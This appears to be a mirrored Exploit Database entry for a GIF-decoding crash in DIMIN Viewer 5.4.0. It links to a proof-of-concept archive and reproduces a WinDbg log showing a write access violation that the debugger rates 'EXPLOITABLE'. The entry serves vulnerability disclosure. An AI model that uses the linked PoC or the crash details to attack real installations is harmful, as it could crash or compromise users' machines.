DIMIN Viewer 5.4.0 – GIF Decode Crash (PoC)

• Exploit Database
• 11 阅读

• 作者： Lizhi Wang
  日期： 2012-12-19
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/23496/

• PoC: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/23496.tar.gz
  
  CommandLine: "C:\Program Files\DIMIN\Viewer5\imgview5.exe"
  Symbol search path is: *** Invalid ***
  ****************************************************************************
  * Symbol loading may be unreliable without a symbol search path. *
  * Use .symfix to have the debugger choose a symbol path. *
  * After setting your symbol path, use .reload to refresh symbol locations. *
  ****************************************************************************
  Executable search path is:
  ModLoad: 00400000 006bb000 image00400000
  ModLoad: 7c900000 7c9b0000 ntdll.dll
  ModLoad: 7c800000 7c8f4000 C:\WINDOWS\system32\kernel32.dll
  ModLoad: 77dd0000 77e6b000 C:\WINDOWS\system32\advapi32.dll
  ModLoad: 77e70000 77f01000 C:\WINDOWS\system32\RPCRT4.dll
  ModLoad: 773d0000 774d2000
  C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.2180_x-ww_a84f1ff9\comctl32.dll
  ModLoad: 77c10000 77c68000 C:\WINDOWS\system32\msvcrt.dll
  ModLoad: 77f10000 77f56000 C:\WINDOWS\system32\GDI32.dll
  ModLoad: 77d40000 77dd0000 C:\WINDOWS\system32\USER32.dll
  ModLoad: 77f60000 77fd6000 C:\WINDOWS\system32\SHLWAPI.dll
  ModLoad: 763b0000 763f9000 C:\WINDOWS\system32\comdlg32.dll
  ModLoad: 7c9c0000 7d1d4000 C:\WINDOWS\system32\SHELL32.dll
  ModLoad: 774e0000 7761c000 C:\WINDOWS\system32\ole32.dll
  ModLoad: 77120000 771ac000 C:\WINDOWS\system32\oleaut32.dll
  ModLoad: 77c00000 77c08000 C:\WINDOWS\system32\version.dll
  ModLoad: 76b40000 76b6d000 C:\WINDOWS\system32\winmm.dll
  ModLoad: 73000000 73026000 C:\WINDOWS\system32\winspool.drv
  (ed4.988): Break instruction exception - code 80000003 (first chance)
  eax=00251eb4 ebx=7ffdb000 ecx=00000000 edx=00000001 esi=00251f48
  edi=00251eb4
  eip=7c901230 esp=0012fb20 ebp=0012fc94 iopl=0 nv up ei pl nz na po
  nc
  cs=001bss=0023ds=0023es=0023fs=003bgs=0000
  efl=00000202
  *** ERROR: Symbol file could not be found.Defaulted to export symbols for
  ntdll.dll -
  ntdll!DbgBreakPoint:
  7c901230 ccint 3
  0:000> g
  ModLoad: 76390000 763ad000 C:\WINDOWS\system32\IMM32.DLL
  ModLoad: 5dac0000 5dac8000 C:\WINDOWS\system32\rdpsnd.dll
  ModLoad: 76360000 76370000 C:\WINDOWS\system32\WINSTA.dll
  ModLoad: 5b860000 5b8b4000 C:\WINDOWS\system32\NETAPI32.dll
  ModLoad: 76bf0000 76bfb000 C:\WINDOWS\system32\PSAPI.DLL
  ModLoad: 5ad70000 5ada8000 C:\WINDOWS\system32\uxtheme.dll
  ModLoad: 74720000 7476b000 C:\WINDOWS\system32\MSCTF.dll
  ModLoad: 755c0000 755ee000 C:\WINDOWS\system32\msctfime.ime
  ModLoad: 10000000 100a7000 C:\Program
  Files\DIMIN\Viewer5\plugin_formats\div5_dcraw.dll
  ModLoad: 71ab0000 71ac7000 C:\WINDOWS\system32\WS2_32.dll
  ModLoad: 71aa0000 71aa8000 C:\WINDOWS\system32\WS2HELP.dll
  ModLoad: 00e90000 00ee3000 C:\Program
  Files\DIMIN\Viewer5\plugin_formats\div5_ffmpeg.dll
  ModLoad: 68700000 68ada000 C:\Program Files\DIMIN\Viewer5\avcodec-51.dll
  ModLoad: 6b780000 6b796000 C:\Program Files\DIMIN\Viewer5\avutil-49.dll
  ModLoad: 6a540000 6a5cb000 C:\Program Files\DIMIN\Viewer5\avformat-52.dll
  ModLoad: 67f40000 67f64000 C:\Program Files\DIMIN\Viewer5\swscale-0.dll
  ModLoad: 00f10000 00f28000 C:\Program
  Files\DIMIN\Viewer5\plugin_formats\div5_ibw.dll
  ModLoad: 00f40000 0104f000 C:\Program
  Files\DIMIN\Viewer5\plugin_formats\div5_xtd_formats.dll
  ModLoad: 01070000 0108a000 C:\Program
  Files\DIMIN\Viewer5\plugin_filters\div5_morphology.dll
  ModLoad: 010b0000 010da000 C:\Program
  Files\DIMIN\Viewer5\plugin_filters\div5_xtdFilters.dll
  ModLoad: 77920000 77a13000 C:\WINDOWS\system32\SETUPAPI.dll
  ModLoad: 77b40000 77b62000 C:\WINDOWS\system32\appHelp.dll
  ModLoad: 76fd0000 7704f000 C:\WINDOWS\system32\CLBCATQ.DLL
  ModLoad: 77050000 77115000 C:\WINDOWS\system32\COMRes.dll
  ModLoad: 77a20000 77a74000 C:\WINDOWS\System32\cscui.dll
  ModLoad: 76600000 7661d000 C:\WINDOWS\System32\CSCDLL.dll
  ModLoad: 75f80000 7607d000 C:\WINDOWS\system32\browseui.dll
  ModLoad: 76990000 769b5000 C:\WINDOWS\system32\ntshrui.dll
  ModLoad: 76b20000 76b31000 C:\WINDOWS\system32\ATL.DLL
  ModLoad: 769c0000 76a73000 C:\WINDOWS\system32\USERENV.dll
  ModLoad: 76980000 76988000 C:\WINDOWS\system32\LINKINFO.dll
  ModLoad: 77760000 778d0000 C:\WINDOWS\system32\SHDOCVW.dll
  ModLoad: 77a80000 77b14000 C:\WINDOWS\system32\CRYPT32.dll
  ModLoad: 77b20000 77b32000 C:\WINDOWS\system32\MSASN1.dll
  ModLoad: 754d0000 75550000 C:\WINDOWS\system32\CRYPTUI.dll
  ModLoad: 76c30000 76c5e000 C:\WINDOWS\system32\WINTRUST.dll
  ModLoad: 76c90000 76cb8000 C:\WINDOWS\system32\IMAGEHLP.dll
  ModLoad: 771b0000 7727e000 C:\WINDOWS\system32\WININET.dll
  ModLoad: 01790000 01799000 C:\WINDOWS\system32\Normaliz.dll
  ModLoad: 5dca0000 5dce5000 C:\WINDOWS\system32\iertutil.dll
  ModLoad: 76f60000 76f8c000 C:\WINDOWS\system32\WLDAP32.dll
  ModLoad: 74e30000 74e9c000 C:\WINDOWS\system32\RichEd20.dll
  ModLoad: 20000000 202c5000 C:\WINDOWS\system32\xpsp2res.dll
  ModLoad: 5cb00000 5cb6e000 C:\WINDOWS\system32\shimgvw.dll
  ModLoad: 4ec50000 4edf3000
  C:\WINDOWS\WinSxS\x86_Microsoft.Windows.GdiPlus_6595b64144ccf1df_1.0.2600.2180_x-ww_522f9f82\gdiplus.dll
  (ed4.988): Access violation - code c0000005 (first chance)
  First chance exceptions are reported before any exception handling.
  This exception may be expected and handled.
  eax=00000000 ebx=0000001c ecx=0012f108 edx=00130000 esi=00000483
  edi=0041b0c4
  eip=0059b5a4 esp=0011ef50 ebp=0011ef88 iopl=0 nv up ei pl nz na po
  nc
  cs=001bss=0023ds=0023es=0023fs=003bgs=0000
  efl=00010202
  *** WARNING: Unable to verify checksum for image00400000
  *** ERROR: Module load completed but symbols could not be loaded for
  image00400000
  image00400000+0x19b5a4:
  0059b5a4 8902mov dword ptr [edx],eax
  ds:0023:00130000=78746341
  0:000> !load MSEC.dll
  0:000> !exploitable -v
  HostMachine\HostUser
  Executing Processor Architecture is x86
  Debuggee is in User Mode
  Debuggee is a live user mode debugging session on the local machine
  Event Type: Exception
  Exception Faulting Address: 0x130000
  First Chance Exception Type: STATUS_ACCESS_VIOLATION (0xC0000005)
  Exception Sub-Type: Write Access Violation
  
  Exception Hash (Major/Minor): 0x6f00020e.0x4621230e
  
  Stack Trace:
  image00400000+0x19b5a4
  image00400000+0x19b73d
  image00400000+0x19b9b3
  Instruction Address: 0x000000000059b5a4
  
  Description: User Mode Write AV
  Short Description: WriteAV
  Exploitability Classification: EXPLOITABLE
  Recommended Bug Title: Exploitable - User Mode Write AV starting at
  image00400000+0x000000000019b5a4 (Hash=0x6f00020e.0x4621230e)
  
  User mode write access violations that are not near NULL are exploitable.